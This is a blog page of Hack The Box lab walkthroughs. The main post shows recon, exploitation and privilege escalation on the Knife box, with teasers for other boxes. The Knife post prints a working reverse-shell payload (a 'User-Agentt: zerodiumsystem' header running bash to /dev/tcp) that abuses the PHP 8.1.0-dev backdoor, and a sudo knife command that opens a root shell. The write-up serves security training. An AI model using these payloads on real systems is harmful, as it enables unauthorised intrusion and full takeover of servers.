Explore HTB - Walkthrough

-
Image
Hey peeps Styx here, This is a quick write-up on the Explore box. The box is rated as easy. But this is also the first android challange!   ____________________________________________________________________________________  # RECON # OS = Android  version =  4.9.214-android-x86_64-g04f9324  ____________________________________________________________________________________  ## PORTS ##  3 ports open  2222 tcp SSH-2.0-SSH Server - Banana Studio  44491 tcp  42135/tcp open http ES File Explorer Name Response httpd  59777 http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older  ____________________________________________________________________________________  #EXPLOITATION# The ES File Explorer service seems to have and arbitrary file read vulnerability. Link can be found  -- > here    run python3 exploit.py listPics 10.10.10.247  We can see a couple of pics in that di...
Post a Comment

Knife HTB Walkthrough

-

Hey guys Styx here. Back after a break. It's time to get back at it. This time I have a HTB walk-through of the Knife box. Let's get into it.  

## RECON ## 

Before we do anything Let's add the IP to our /etc/hosts file 

Now let's kick off our recon. 

Rustscan show's 2 ports open. 

port 22 which is SSH and port 80 which is HTTP.

Well let's look at what technology is running on the server. Using the Wappalyzer plugin, we see that this web app is running on PHP 8.1.0. Let's Give it a quick google and we quickly find this exploit HERE

Blog about this cool find over here -->HERE 

An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.

## Initial Foothold ## 

Now that we have found a good lead. Let's try and gain our initial foothold. If you've read the article and looked at the exploit over at exploit-db let's exploit this backdoor by adding the following header to the GET request. 

User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >&/dev/tcp/IP/PORT 0>&1'"); 

 


As you can see on the picture above. We are in! Looking at our user We see that we are James. Let's head over to his home directory to see if he has some useful info on his home directory. And there's the User.txt! 

## Privilege escalation ## 

Let's perform some local enumeration to see if we can find a good privilege escalation vector in order to root this box. One of the first things I do in this phase is to run the sudo -l command to see whether this user is allowed to use sudo.

well look at that! We can run sudo /usr/bin/knife After inspecting the knife binary we can gain a root shell by running: sudo knife exec --exec "exec '/bin/sh -i' "

 

And we rooted the box!

Hope this walk through was useful to you. See you in the next one!

Popular posts from this blog

Explore HTB - Walkthrough

-
Image
Hey peeps Styx here, This is a quick write-up on the Explore box. The box is rated as easy. But this is also the first android challange!   ____________________________________________________________________________________  # RECON # OS = Android  version =  4.9.214-android-x86_64-g04f9324  ____________________________________________________________________________________  ## PORTS ##  3 ports open  2222 tcp SSH-2.0-SSH Server - Banana Studio  44491 tcp  42135/tcp open http ES File Explorer Name Response httpd  59777 http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older  ____________________________________________________________________________________  #EXPLOITATION# The ES File Explorer service seems to have and arbitrary file read vulnerability. Link can be found  -- > here    run python3 exploit.py listPics 10.10.10.247  We can see a couple of pics in that di...
Read more

Schooled HTB -Writeup

-
Image
Hey guys Styx here, In this write-up I'll walk you through the steps in order to root the Schooled box. This box is rated medium and is in my opinion,a realistic scenario. Hopefully this write-up can be of educational value to you. Let's get into it! # Start Enum # Like every pen-test we start off with some reconnaissance. We scan for open ports and services that are exposed by the target machine. In the picture you can see the Nmap results.    nmap output In the Nmap results we see that our target has 2 ports open. The first thing I tried was to check for content on port 80. but our content discovery on the initial port led nowhere. so lets' enumerate possible subdomains.     ## SUBDOMAIN ENUM ## ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://schooled.htb/ -H 'Host: FUZZ.schooled.htb' -fs 20750 A very useful and quick tool to perform this enumeration is the tool FFUF. Check it out on github. As you can see on the pic above w...
Read more

Seal HTB Walkthrough

-
Image
Hey dudes and dudettes. In this post we'll be walking through the Seal Box. This box is rated as medium.  ## RECON ## Let's start with a quick nmap and see what ports and services are open.  ____________________________________________________________________________________ PORT     STATE SERVICE    REASON  VERSION 22/tcp   open  ssh        syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey:  |   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC1FohcrXkoPYUOtmzAh5PlCU2H0+sFcGl6XXS6vX2lLJ3RD2Vd+KlcYtc2wQLjcYJhkFe793jmkogOSh0uI+fKQA9z1Ib3J0vtsIaNkXxvSMPcr54QxXgg1guaM1OQl43ePUADXnB6WqAg8QyF6Nxoa18vboOAu3a8Wn9Qf9iCpoU93d5zQj+FsBKVaDs3zuJkUBRfjsqq7rEMpxqCfkFIeUrJF9MBsQhgsEVUbo1zicWG32m49PgDbKr9yE3lPsV9K4b9ugNQ3zwWW5a1OpOs+r3AxFcu2q65N2znV3/p41ul9+fWXo9pm0jJPJ3V5gZphDkXVZEw16K2hcgQcQJUH7luaVTRpzqDxXaiK/8wChtMXEUjFQKL6sn...
Read more